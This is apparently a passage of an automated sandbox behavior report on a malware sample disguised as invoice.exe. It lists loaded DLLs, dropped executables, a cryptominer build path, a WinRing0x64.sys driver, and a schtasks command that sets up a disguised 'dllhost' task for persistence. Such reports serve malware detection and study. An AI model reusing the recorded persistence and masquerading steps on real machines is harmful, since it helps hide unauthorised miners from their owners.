Source: C:\Users\user\Desktop\invoice.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\Desktop\invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: invoice.exeStatic file information: File size 1262619 > 1048576
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: invoice.exe
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegSvcs.exe, 00000006.00000002.2889790802.0000000000807000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: RegSvcs.exe, 00000006.00000002.2894124210.0000000004D73000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: RegSvcs.exe, 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceModel.pdb3> source: RegSvcs.exe, 00000006.00000002.2889790802.0000000000807000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb2 source: RegSvcs.exe, 00000006.00000002.2889790802.00000000008AC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceModel.pdb source: RegSvcs.exe, 00000006.00000002.2889790802.000000000089D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2889790802.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegSvcs.exe, 00000006.00000002.2889790802.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\invoice.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_5853546Jump to behavior
                  Source: invoice.exeStatic PE information: section name: .didat
                  Source: 4usfliof.exe.0.drStatic PE information: section name: .aliz1
                  Source: 4usfliof.exe.0.drStatic PE information: section name: .aliz1
                  Source: 4usfliof.exe.0.drStatic PE information: section name: .aliz1
                  Source: 4usfliof.exe.0.drStatic PE information: section name: .aliz1
                  Source: yee9mbi69cm7.exe.0.drStatic PE information: section name: .aliz1
                  Source: yee9mbi69cm7.exe.0.drStatic PE information: section name: .aliz1
                  Source: yee9mbi69cm7.exe.0.drStatic PE information: section name: .aliz1
                  Source: yee9mbi69cm7.exe.0.drStatic PE information: section name: .aliz1

                  Persistence and Installation Behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\ProgramData\Dllhost\WinRing0x64.sys
Source: C:\Users\user\Desktop\invoice.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe
Source: C:\Users\user\Desktop\invoice.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe

                  Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe - Process information set: NOOPENFILEERRORBOX
